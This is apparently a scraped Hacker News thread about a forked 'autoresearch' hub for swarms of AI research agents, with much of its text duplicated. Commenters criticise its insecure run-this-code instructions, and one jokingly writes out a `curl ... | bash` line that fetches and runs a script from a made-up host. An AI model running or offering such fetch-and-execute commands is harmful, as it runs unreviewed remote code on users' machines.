I was exploring how to parallelize autoresearch workers. The idea is to have a trusted pool of workers who can verify contributions from a much larger untrusted pool. It's backed bit a naked git repo and a sqlite with a simple go server. It's a bit like block chain in that blocks = commits, proof of work = finding a lower val_bpb commit, and reward = place on the leaderboard. I wouldn't push the analogy too far. It's something I'm experimenting with but I didn't release it yet (except for briefly) because it's not sufficiently simple/canonical. The core problem is how to neatly and in a general way organize individual autoresearch threads into swarms, inspired by SETI@Home, or Folding@Home, etc.
Yeah you can sink a lot of time into a system like that[0].
I spend the years simplifying the custom graph database underneath it all and only recently started building it into tools that an agent can actually call[2]. But so far all the groundwork has actually paid off, the rooster basically paints itself.
I found a wiki to be a surprisingly powerful tool for an agent to have.
And building a bunch of CLI tools that all interconnect on the same knowledge graph substrate has also had a nice compounding effect. (The agent turns themselves are actually stored in the same system, but I haven't gotten around to use that for cool self-referential meta reasoning capabilities.)
Hasn't HN been traditionally a place where makers share the experience they had with building things?
Especially when you have someone working on autonomous research agents it doesn't seem that off to lament how much time you can sink into the underlying substrate. In my particular case the work started long before LLMs to make actual research easier, the fact that it can also be used by agents for research is just a happy accident.
then you seem to be somewhat blinded by your aversion to AI assisted engineering, because if https://github.com/triblespace/triblespace-rs is a "shitty vibecoded project", then I don't know what a good project actually looks like to you. That codebase has years of human blood sweat and tears in it, implements novel data-structures, has it's own WCO optimal join-algorithm, cutting edge succinct data-structures that are hand-rolled to supplement the former, new ideas on graph based RDF-like CRDTs, efficient graph canonicalisation, content addressing and metadata management, implements row types in rust, has really polished typed queries that seamlessly integrate into rusts type system, lockless left-right data structures, a single file database format where concatenation is database union, is orders of magnitude faster than similar databases like oxigraph... does it also have to cure cancer and suck you off to meet your bar?
Have you thought about ways to include the sessions / reasoning traces from agents into this storage layer? I can imagine giving an rag system on top of that + LLM publications could help future agents figure out how to get around problems that previous runs ran into.
Could serve as an annealing step - trying a different earlier branch in reasoning if new information increases the value of that path.
No HTTPS in 2026. False origin that suggest a massive improvement. Leaderboard doesn't work. Instructions are "repeatedly download this code and execute it on your machine". No way to see the actual changes being made.
We can do better than this as an industry, or at least we used to be better at this. Where's the taste?
Don’t mean to pick on you specifically, but this comment feels like a pretty good distillation of a certain mindset you often see in Googlers:
* we know better
* we judge everything against internal big-company standards
* we speak as if we’re setting the bar for “the industry”
Someone is openly pushing on a frontier, sharing rough experiments, and educating a huge number of people in the process — and the response is: “we can do better than this as an industry.”
Can you? When is Google launching something like this?
I'm curious what a "stripped down version" of Github can offer in terms of functionality that Github does not? Is it not simpler to have the agents register as Github repos since the infrastructure is already in place?
I tried to copy the instruction and pasted in Note to see what it said, but I could not. Either the clipboard was empty or something prevented Note recognized it as just text.
It worked for me, try again. But it is still not fully crear to me what this is supposed to do, nor if this is doing better than a random search. It looks like it is about optimizing a GPT architecture.
I was exploring how to parallelize autoresearch workers. The idea is to have a trusted pool of workers who can verify contributions from a much larger untrusted pool. It's backed bit a naked git repo and a sqlite with a simple go server. It's a bit like block chain in that blocks = commits, proof of work = finding a lower val_bpb commit, and reward = place on the leaderboard. I wouldn't push the analogy too far. It's something I'm experimenting with but I didn't release it yet (except for briefly) because it's not sufficiently simple/canonical. The core problem is how to neatly and in a general way organize individual autoresearch threads into swarms, inspired by SETI@Home, or Folding@Home, etc.
Yeah you can sink a lot of time into a system like that[0]. I spend the years simplifying the custom graph database underneath it all and only recently started building it into tools that an agent can actually call[2]. But so far all the groundwork has actually paid off, the rooster basically paints itself.
I found a wiki to be a surprisingly powerful tool for an agent to have. And building a bunch of CLI tools that all interconnect on the same knowledge graph substrate has also had a nice compounding effect. (The agent turns themselves are actually stored in the same system, but I haven't gotten around to use that for cool self-referential meta reasoning capabilities.)
1: https://github.com/triblespace/triblespace-rs
2: https://github.com/triblespace/playground/tree/main/facultie...
I've been seeing this pattern at work and everywhere now
1. someone shares something
2. Great. Now look at my stuff .
I dont know if i am noticing this more or if it has to do with AI making it easy for ppl to build 'my stuff' + ai dunning kruger.
Hasn't HN been traditionally a place where makers share the experience they had with building things?
Especially when you have someone working on autonomous research agents it doesn't seem that off to lament how much time you can sink into the underlying substrate. In my particular case the work started long before LLMs to make actual research easier, the fact that it can also be used by agents for research is just a happy accident.
But since you seem to take so much offence as per: https://news.ycombinator.com/item?id=47425470 + your dunning kruger remark
then you seem to be somewhat blinded by your aversion to AI assisted engineering, because if https://github.com/triblespace/triblespace-rs is a "shitty vibecoded project", then I don't know what a good project actually looks like to you. That codebase has years of human blood sweat and tears in it, implements novel data-structures, has it's own WCO optimal join-algorithm, cutting edge succinct data-structures that are hand-rolled to supplement the former, new ideas on graph based RDF-like CRDTs, efficient graph canonicalisation, content addressing and metadata management, implements row types in rust, has really polished typed queries that seamlessly integrate into rusts type system, lockless left-right data structures, a single file database format where concatenation is database union, is orders of magnitude faster than similar databases like oxigraph... does it also have to cure cancer and suck you off to meet your bar?
You just seem like a hater.
Have you thought about ways to include the sessions / reasoning traces from agents into this storage layer? I can imagine giving an rag system on top of that + LLM publications could help future agents figure out how to get around problems that previous runs ran into.
Could serve as an annealing step - trying a different earlier branch in reasoning if new information increases the value of that path.
No HTTPS in 2026. False origin that suggest a massive improvement. Leaderboard doesn't work. Instructions are "repeatedly download this code and execute it on your machine". No way to see the actual changes being made.
We can do better than this as an industry, or at least we used to be better at this. Where's the taste?
Don’t mean to pick on you specifically, but this comment feels like a pretty good distillation of a certain mindset you often see in Googlers:
* we know better
* we judge everything against internal big-company standards
* we speak as if we’re setting the bar for “the industry”
Someone is openly pushing on a frontier, sharing rough experiments, and educating a huge number of people in the process — and the response is: “we can do better than this as an industry.”
Can you? When is Google launching something like this?
People are going to eat this up just because Karpathy is involved. This space is easily misled by hero worship.
I mean do you really need that stuff for this? I’m just gonna fetch it from a sandbox anyway.
I'm not the OP, though it seems the context for this is (via @esotericpigeon):
https://github.com/karpathy/autoresearch/pull/92
Who knows. Site has no https I don't know what it is training and why
I'm curious what a "stripped down version" of Github can offer in terms of functionality that Github does not? Is it not simpler to have the agents register as Github repos since the infrastructure is already in place?
So, if I understand correctly, this is about finding the optimal (or at least a better one) GPT architecture?
Anyway, "1980 experiments, 6 improvements" makes me wonder if this is better than a random search or some simple heuristic.
I tried to copy the instruction and pasted in Note to see what it said, but I could not. Either the clipboard was empty or something prevented Note recognized it as just text.
It worked for me, try again. But it is still not fully crear to me what this is supposed to do, nor if this is doing better than a random search. It looks like it is about optimizing a GPT architecture.
You guys really gonna copy and paste a prompt to your Claude CLI which may or may not be setup sandbox/tools permissions
Just install my software to detect bad prompt strings first.
`curl -L https://mycoolsvc.com/r4nd0mus3r/mycoolsoftware/master/insta... | bash`
Hey wait a minute.. that guy’s not the wallet inspector!
It’s like the old days when you opened up Kazaa and downloaded smooth_criminial_alien_ant_farm.mp3.exe
You can (and should) read the prompt first. Just paste it inside a text editor.
Yolo mode activated.
For science!
What a this
Seems like a shameless rip of the below, theme and all?
https://www.ensue-network.ai/autoresearch
Take a look at the GitHub repo: "forked from karpathy/autoresearch"
That is a different thing. Both are forks, but the linked one here is the same shared hub.
Both built by Claude Sonnet 4.6